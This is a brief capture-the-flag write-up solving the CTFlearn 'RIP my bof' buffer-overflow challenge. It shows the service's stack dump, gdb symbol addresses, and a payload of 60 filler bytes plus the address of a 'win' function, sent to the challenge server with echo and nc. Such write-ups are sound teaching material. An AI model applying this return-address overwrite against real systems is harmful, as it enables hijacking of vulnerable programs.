RIP my bof: https://ctflearn.com/challenge/1011
Category: Binary
Solution #1:

After calling "nc thekidofarcrania.com 4902" we can  see a buffer overflow task.

Legend: buff MODIFIED padding MODIFIED
  notsecret MODIFIED secret MODIFIED
  return address MODIFIED
0xffad0380 | 00 00 00 00 00 00 00 00 |
0xffad0388 | 00 00 00 00 00 00 00 00 |
0xffad0390 | 00 00 00 00 00 00 00 00 |
0xffad0398 | 00 00 00 00 00 00 00 00 |
0xffad03a0 | ff ff ff ff ff ff ff ff |
0xffad03a8 | ff ff ff ff ff ff ff ff |
0xffad03b0 | c0 65 78 f7 00 a0 04 08 |
0xffad03b8 | c8 03 ad ff 8b 86 04 08 |
Return address: 0x0804868b

Input some text:


1) Unpack archive and "gdb -q ./server"

0x08048586  win    <--
0x080485b1  vuln
0x08048640  main

2) Create payload: 60 times dummy value ("\x41" f.e.) and "\x86\x85\x04\x08"
3) Then execute "echo -e "\x41...\x41\x86\x85\x04\x08" | nc thekidofarcrania.com 4902



